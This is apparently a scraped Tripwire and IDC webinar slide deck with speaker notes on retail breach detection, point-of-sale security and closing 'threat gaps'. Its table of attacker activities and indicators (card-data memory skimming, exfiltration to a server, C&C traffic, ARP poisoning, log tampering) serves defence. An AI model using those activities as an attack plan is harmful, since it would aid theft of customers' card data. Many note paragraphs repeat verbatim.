Retail data breaches can have a serious impact on profitability and the costs of a cybersecurity incident may impact the C-Suite as well as consumer trust.
Tripwire’s chief technology officer Dwayne Melançon (@ThatDwayne) and vice president of security products at IDC Charles Kolodgy (@ckolodgy_idc) discuss the current retail cyber threat landscape with a focus on strategies to mitigate the cybersecurity risks and reduce the costs of potential security breaches, including:
- How to identify the early stages of a data breach
- Why point-of-sale and other business-critical systems require a different approach to data security
- How retailers can use the Top 20 Critical Security Controls to make businesses ‘unattractive’ to cybercriminals
- Qualified attendees will earn one CPE credit for participation in this webcast
A recording of the webcast that accompanies this slide deck can be found here: http://www.tripwire.com/register/retail-security-closing-the-threat-gap/
25. The Retail Security Challenge
• Retailers are prime targets for cybercriminals
• Defensive measures to stop cyber attacks
are not enough
• Retailers need the capability to detect attacks
early to minimize loss
• Customer trust and brand equity is at stake
31. Threat Detection Gap
• Are we prioritizing the high-risk breach alerts for
critical assets amongst thousands of them?
• Are there other events of interest or risky
changes to business critical systems?
• Are these actionable high-confidence alerts
from my “trusted security source”?
• Are we able to drill-down for root-cause
analysis and forensics?
• Do we have Threat Intelligence to understand
the nature and severity of the breach alerts?
DETECTION
GAP
32. Threat Response Gap
• What are all the affected systems, POS, servers,
network devices, operating systems, databases, file
systems, desktops etc.?
• What changed?
• When?
• By whom - authorized/unauthorized?
• What systems can we trust and what systems
are compromised?
• Do we have control? Can we revert to the
“good” baseline?
• Do we have policies, resources and tools
to revert to a trusted production state?
RESPONSE
GAP
33. Threat Prevention Gap
• Do we have full coverage?
• Do we know which are our most
business-critical assets?
• Secure management sponsorship and set key
system integrity indicators
• Is our continuous monitoring and threat
detection process reducing our threat gaps
• Finally, evolve to new best security practices
for our context – industry, region, size, type,
legal requirements, etc.
PREVENTION
GAP
38. Cyber Attackers - Activity Threat Indicator
Account credentials created outside standard
processes
Active Directory Changes
Local Admin Accounts
Malware injected on POS system File System Change
Traffic to C&C server
Credit card data skimmed from memory and
written to a temporary file
File System Change
Credit card data moved to exfiltration server Unusual network activity
Rogue services running on server
A unauthorized device accesses the network Rogue device detected
Unusual network activity
Man In The Middle attack ARP Cache poisoning
Hiding tracks / obscuring evidence Logging disabled
Log data altered
Hiding data from traditional tools Data in alternate data streams
Elevation of privileges, obscuring identity Use of su / sudo to change user accounts
Inbound exploit destined for a vulnerable system Traffic with known payload
Vulnerability present on target system
39. Cyber Attackers - Activity Threat Indicator
Account credentials created outside standard
processes
Active Directory Changes
Local Admin Accounts
Malware injected on POS system File System Change
Traffic to C&C server
Credit card data skimmed from memory and
written to a temporary file
File System Change
Credit card data moved to exfiltration server Unusual network activity
Rogue services running on server
A unauthorized device accesses the network Rogue device detected
Unusual network activity
Man In The Middle attack ARP Cache poisoning
Hiding tracks / obscuring evidence Logging disabled
Log data altered
Hiding data from traditional tools Data in alternate data streams
Elevation of privileges, obscuring identity Use of su / sudo to change user accounts
Inbound exploit destined for a vulnerable system Traffic with known payload
Vulnerability present on target system
53. DETECTION
GAP
RESPONSE
GAP
PREVENTION
GAP
DETECTION
GAP
RESPONSE
GAP
PREVENTION
GAP
Discover & profile all IT
infrastructure
Minimize vulnerabilities and
harden configurations to
reduce threat surface
Real-time detection of
suspicious behavior
Forward events of interest to
focus and enrich analysis &
correlation
Prioritize based on business context
Identify compromise by comparison
against baseline
Support forensic & incident response
Copyright IDC. Reproduction is forbidden unless authorized. All rights reserved.
Attacks opportunistic
DELIVERING CYBERTHREAT SECURITY FOR CRITICAL SYSTEMS
TO DETECT, PREVENT AND RESPOND TO ENTERPRISE THREATS
Retailers are prime targets for cybercriminals because of the opportunity to steal your customers personal and financial data, POS intrustions are the number one type of breach in the past three years
Defensive measures to stop cyber attacks from penetrated the network are not enough, the assumption needs to be that you will be breached it is just a matter of when.
Retailer must deploy a layered approach to security, including network perimeter based security, anti-malware and endpoint security for business critical endpoint servers, POS endpoints and desktops
Focus must be on detective capability early in the attack life cycle
Retailers need answers to these questions……..quickly
How do I know if I have been breached?
How can I detect a breach before significant loss has occurred?
How do I protect myself so that I am not an attractive cybercrime target?
How can I protect the customer data on my POS systems?
Are we continuously monitoring all our critical endpoints for early indicators of risk and breach activity?
How can I quickly contain my exposure in case of a breach?
------------
This is one of the biggest challenges in enterprise security teams face today--Many times you have heard the phrase in security, “it’s not a matter of if you have been breached, but when”. I would like to add to that, it is also important to identify how long you have been exposed, or simply being able to detect if you have been breached in the first place.
The enterprise threat gap is a model that helps us illustrate the amount of time that passes through three critical phases.
The detection gap indicates the amount of time it takes to discover an actual compromise and identify it’s scope.
The remediation gap indicates the time between that detection and the amount of time it takes to limit the damage.
Then we have the preventive gap which is the measure of time it takes to avoid repeated or similar attacks.
Transition: Lets talk about the challenges in each of these phases in more detail--
This process allows you to answer three key questions to the business:
Have we been breached?
How bad is it?
Can we avoid this from happening again?
This is one of the biggest challenges in enterprise security teams face today--Many times you have heard the phrase in security, “it’s not a matter of if you have been breached, but when”. I would like to add to that, it is also important to identify how long you have been exposed, or simply being able to detect if you have been breached in the first place.
The enterprise threat gap is a model that helps us illustrate the amount of time that passes through three critical phases.
The detection gap indicates the amount of time it takes to discover an actual compromise and identify it’s scope.
The remediation gap indicates the time between that detection and the amount of time it takes to limit the damage.
Then we have the preventive gap which is the measure of time it takes to avoid repeated or similar attacks.
Transition: Lets talk about the challenges in each of these phases in more detail--
This process allows you to answer three key questions to the business:
Have we been breached?
How bad is it?
Can we avoid this from happening again?
This is one of the biggest challenges in enterprise security teams face today--Many times you have heard the phrase in security, “it’s not a matter of if you have been breached, but when”. I would like to add to that, it is also important to identify how long you have been exposed, or simply being able to detect if you have been breached in the first place.
The enterprise threat gap is a model that helps us illustrate the amount of time that passes through three critical phases.
The detection gap indicates the amount of time it takes to discover an actual compromise and identify it’s scope.
The remediation gap indicates the time between that detection and the amount of time it takes to limit the damage.
Then we have the preventive gap which is the measure of time it takes to avoid repeated or similar attacks.
Transition: Lets talk about the challenges in each of these phases in more detail--
This process allows you to answer three key questions to the business:
Have we been breached?
How bad is it?
Can we avoid this from happening again?
This is one of the biggest challenges in enterprise security teams face today--Many times you have heard the phrase in security, “it’s not a matter of if you have been breached, but when”. I would like to add to that, it is also important to identify how long you have been exposed, or simply being able to detect if you have been breached in the first place.
The enterprise threat gap is a model that helps us illustrate the amount of time that passes through three critical phases.
The detection gap indicates the amount of time it takes to discover an actual compromise and identify it’s scope.
The remediation gap indicates the time between that detection and the amount of time it takes to limit the damage.
Then we have the preventive gap which is the measure of time it takes to avoid repeated or similar attacks.
Transition: Lets talk about the challenges in each of these phases in more detail--
This process allows you to answer three key questions to the business:
Have we been breached?
How bad is it?
Can we avoid this from happening again?
This is one of the biggest challenges in enterprise security teams face today--Many times you have heard the phrase in security, “it’s not a matter of if you have been breached, but when”. I would like to add to that, it is also important to identify how long you have been exposed, or simply being able to detect if you have been breached in the first place.
The enterprise threat gap is a model that helps us illustrate the amount of time that passes through three critical phases.
The detection gap indicates the amount of time it takes to discover an actual compromise and identify it’s scope.
The remediation gap indicates the time between that detection and the amount of time it takes to limit the damage.
Then we have the preventive gap which is the measure of time it takes to avoid repeated or similar attacks.
Transition: Lets talk about the challenges in each of these phases in more detail--
This process allows you to answer three key questions to the business:
Have we been breached?
How bad is it?
Can we avoid this from happening again?
Do we have full coverage? Are we missing any critical events and alerts?
Can we directly watch for “risky changes” to critical system configs and files?
Are these actionable high-confidence alerts from my “trusted security source” ?
( false positive and unproven technology issue )
Can we compare current system state(s) with what we expect? ( beyond just alerts/logs )
Are we looking at breach info in real-time, without loss?
What systems can we trust and what systems are compromised?
Correlate system state information with other sources for greater accuracy
Rank findings and difference based on risk and value
Do we have policies, resources and tools to revert to a trusted production state?
Remove the suspicious or known malicious assets
Remove or reduce access to production systems
Change all production credentials
Freeze changes, except by core-threat team
Finally, Revert to a trusted production state
Recreate systems from trusted sources
Harden the systems to prevent re-infection or repeat compromises
Should we assess our architecture and policies to reduce the opportunity for future compromise?
Establish Policies and Processes – security and configurations
Establish baseline and “Good Configuration”
Establish hardened security configurations
Secure Management Sponsorship and key system integrity indicators
Establish “security-metrics” that indicates health of the systems and networks...
At department, asset class, location level – in words that the C-level understands
Is our continuous monitoring and threat detection process effective?
Anchor to a known, trusted standard
Detect variance early
Isolate and mitigate incidents before loss occurs
Understand patterns to better detect anomalies
Shorten time to detection
Diagnose efficiently & effectively
Full text:
Detecting an attack in the Recon and W&D phase is very difficult because attackers have become very good at camouflaging themselves as legitimate traffic
Various types of anti-malware products maybe able to detect a breach during the Malicious Action phase, but this is most often late in the attack cycle after a loss has occurred
The opportunity for detection is highest during the Exploitation phase when the attacker is making repeated changes to the host/endpoint file system
Full text:
Detecting an attack in the Recon and W&D phase is very difficult because attackers have become very good at camouflaging themselves as legitimate traffic
Various types of anti-malware products maybe able to detect a breach during the Malicious Action phase, but this is most often late in the attack cycle after a loss has occurred
The opportunity for detection is highest during the Exploitation phase when the attacker is making repeated changes to the host/endpoint file system
Early breach detection requires continuous monitoring of all business critical systems including; Servers, network devices, POS systems and desktops.
Monitoring of just desktops are not sufficient, focus should also be on systems that contain critical assets like customer data , including in the data center.
An example of a critical desktop would be all System Administrators who have user admin access
Early breach detection requires continuous monitoring of all business critical systems including; Servers, network devices, POS systems and desktops.
Monitoring of just desktops are not sufficient, focus should also be on systems that contain critical assets like customer data , including in the data center.
An example of a critical desktop would be all System Administrators who have user admin access
Example - Monitoring User ID/Log in to look for anomalies
o Ex- user logs into a server that they have never accessed, TE & TLC could detect this and then also monitor exactly what that user did to make a diagnosis if this is indeed a breach or needs investigation
· Tie POS to the bigger threat picture (correlating changes on a POS system with corporate servers)
Example - Monitoring User ID/Log in to look for anomalies
o Ex- user logs into a server that they have never accessed, TE & TLC could detect this and then also monitor exactly what that user did to make a diagnosis if this is indeed a breach or needs investigation
· Tie POS to the bigger threat picture (correlating changes on a POS system with corporate servers)
Example - Monitoring User ID/Log in to look for anomalies
o Ex- user logs into a server that they have never accessed, TE & TLC could detect this and then also monitor exactly what that user did to make a diagnosis if this is indeed a breach or needs investigation
· Tie POS to the bigger threat picture (correlating changes on a POS system with corporate servers)
Example - Monitoring User ID/Log in to look for anomalies
o Ex- user logs into a server that they have never accessed, TE & TLC could detect this and then also monitor exactly what that user did to make a diagnosis if this is indeed a breach or needs investigation
· Tie POS to the bigger threat picture (correlating changes on a POS system with corporate servers)
Example - Monitoring User ID/Log in to look for anomalies
o Ex- user logs into a server that they have never accessed, TE & TLC could detect this and then also monitor exactly what that user did to make a diagnosis if this is indeed a breach or needs investigation
· Tie POS to the bigger threat picture (correlating changes on a POS system with corporate servers)
Example - Monitoring User ID/Log in to look for anomalies
o Ex- user logs into a server that they have never accessed, TE & TLC could detect this and then also monitor exactly what that user did to make a diagnosis if this is indeed a breach or needs investigation
· Tie POS to the bigger threat picture (correlating changes on a POS system with corporate servers)
Example - Monitoring User ID/Log in to look for anomalies
o Ex- user logs into a server that they have never accessed, TE & TLC could detect this and then also monitor exactly what that user did to make a diagnosis if this is indeed a breach or needs investigation
· Tie POS to the bigger threat picture (correlating changes on a POS system with corporate servers)
Example - Monitoring User ID/Log in to look for anomalies
o Ex- user logs into a server that they have never accessed, TE & TLC could detect this and then also monitor exactly what that user did to make a diagnosis if this is indeed a breach or needs investigation
· Tie POS to the bigger threat picture (correlating changes on a POS system with corporate servers)
Tripwire core competency is collecting data—challlenge is that humans cannot deal with it
Driving Effective Security and Compliance—done on top of a bed of real system state intelligence
Driven by
VM –big change—vm assessment instantly
Tripwire core competency is collecting data—challlenge is that humans cannot deal with it
Driving Effective Security and Compliance—done on top of a bed of real system state intelligence
Driven by
VM –big change—vm assessment instantly
Tripwire core competency is collecting data—challlenge is that humans cannot deal with it
Driving Effective Security and Compliance—done on top of a bed of real system state intelligence
Driven by
VM –big change—vm assessment instantly
85% of attacks result from known vulnerabilities
85% of attacks result from known vulnerabilities
85% of attacks result from known vulnerabilities
DELIVERING CYBERTHREAT SECURITY FOR CRITICAL SYSTEMS
TO DETECT, PREVENT AND RESPOND TO ENTERPRISE THREATS